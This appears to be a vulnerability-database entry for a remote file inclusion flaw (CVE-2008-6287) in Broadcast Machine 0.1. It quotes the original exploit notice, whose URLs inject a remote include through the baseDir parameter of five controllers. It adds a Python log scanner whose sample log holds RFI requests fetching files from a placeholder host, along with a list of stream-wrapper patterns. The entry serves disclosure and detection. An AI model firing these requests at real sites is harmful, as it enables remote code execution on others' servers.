Getmiro Broadcast Machine Multiple Remote File Inclusion Vulnerabilities

Vulnerability ID: 1116874
Vulnerability type: Code injection
Published: 2008-11-30
Updated: 2009-02-26
CVE ID: CVE-2008-6287
CNNVD ID: CNNVD-200902-580
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/7310
https://cxsecurity.com/issue/WLB-2009020291
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-580
|Vulnerability details
Multiple PHP remote file inclusion vulnerabilities exist in Broadcast Machine 0.1. A remote attacker can execute arbitrary PHP code via a URL supplied in the baseDir parameter of (1) MySQLController.php, (2) SQLController.php, (3) SetupController.php, (4) VideoController.php, and (5) ViewController.php under controllers/.
|Vulnerability EXP
=================================================================================================================


  [o] Broadcast Machine 0.1 Multiple Remote File Inclusion Vulnerability

       Software    : Broadcast Machine version 0.1
       Vendor      : http://code.google.com/p/broadcastmachine/
       View Source : https://svn.participatoryculture.org/svn/dtv/trunk/bmachine2/
       Author      : NoGe
       Contact     : noge[dot]code[at]gmail[dot]com
       Blog        : http://evilc0de.blogspot.com


=================================================================================================================


  [o] Vulnerable file

       all files below are affected via the "baseDir" parameter

        controllers/MySQLController.php

        controllers/SQLController.php

        controllers/SetupController.php

        controllers/VideoController.php

        controllers/ViewController.php



  [o] Exploit


       http://localhost/[path]/controllers/MySQLController.php?baseDir=[evilcode]

       http://localhost/[path]/controllers/SQLController.php?baseDir=[evilcode]

       http://localhost/[path]/controllers/SetupController.php?baseDir=[evilcode]

       http://localhost/[path]/controllers/VideoController.php?baseDir=[evilcode]

       http://localhost/[path]/controllers/ViewController.php?baseDir=[evilcode]


=================================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/blog/]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11 martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]

        
=================================================================================================================

# milw0rm.com [2008-11-30]
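The advisory above shows what an exploitation attempt looks like on the wire: a request to one of the five affected controllers with a URL in baseDir. The following is an added example (not part of the original advisory or of Broadcast Machine) that turns that description into a detection check over web-server access logs: it flags requests to the listed controllers whose baseDir value starts with a remote scheme or stream wrapper. The log lines, IP addresses, paths and the `/bm/` install prefix are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# The controllers the advisory lists as including baseDir unsafely.
AFFECTED_CONTROLLERS = {
    "MySQLController.php", "SQLController.php", "SetupController.php",
    "VideoController.php", "ViewController.php",
}
# Schemes and PHP stream wrappers that would make include() fetch attacker-controlled code.
REMOTE_SCHEME = re.compile(r"^(?:https?|ftps?|php|data|expect|zip|phar)://", re.IGNORECASE)
# Minimal Apache/nginx combined-log parser: client IP, timestamp, request target, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def classify_request(target):
    """Return (controller, baseDir value) when the target matches the advisory's RFI pattern, else None."""
    parts = urlsplit(target)
    if "/controllers/" not in parts.path:
        return None
    controller = parts.path.rsplit("/", 1)[-1]
    if controller not in AFFECTED_CONTROLLERS:
        return None
    # PHP's $_GET keys are case-sensitive, so only the exact parameter name matters.
    for value in parse_qs(parts.query, keep_blank_values=True).get("baseDir", []):
        value = unquote(value)  # parse_qs decoded once; decode again to catch double encoding
        if REMOTE_SCHEME.match(value) or value.startswith("//"):
            return controller, value
    return None

def scan_log(lines):
    """Run classify_request over raw log lines and return one dict per suspected RFI attempt."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        found = classify_request(m.group("target"))
        if found:
            hits.append({"ip": m.group("ip"), "controller": found[0],
                         "baseDir": found[1], "status": int(m.group("status"))})
    return hits

# Constructed sample log: two RFI attempts, one normal request, one probe against an unaffected script.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Nov/2008:10:01:02 +0000] "GET /bm/controllers/MySQLController.php?baseDir=http://198.51.100.7/inc.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [30/Nov/2008:10:01:09 +0000] "GET /bm/controllers/ViewController.php?baseDir=http%3A%2F%2F198.51.100.7%2Fs.txt%3F HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [30/Nov/2008:10:02:00 +0000] "GET /bm/controllers/ViewController.php?id=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [30/Nov/2008:10:02:30 +0000] "GET /bm/index.php?baseDir=http://198.51.100.7/x HTTP/1.1" 404 210 "-" "curl/7.19"',
]
```

A hit with status 200 is the case to investigate first, since a 200 is consistent with the include having succeeded rather than being rejected.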
|References

Source: XF
Name: broadcastmachine-basedir-file-include(46939)
Link: http://xforce.iss.net/xforce/xfdb/46939

Source: VUPEN
Name: ADV-2008-3289
Link: http://www.vupen.com/english/advisories/2008/3289

Source: BID
Name: 32554
Link: http://www.securityfocus.com/bid/32554

Source: MILW0RM
Name: 7310
Link: http://www.milw0rm.com/exploits/7310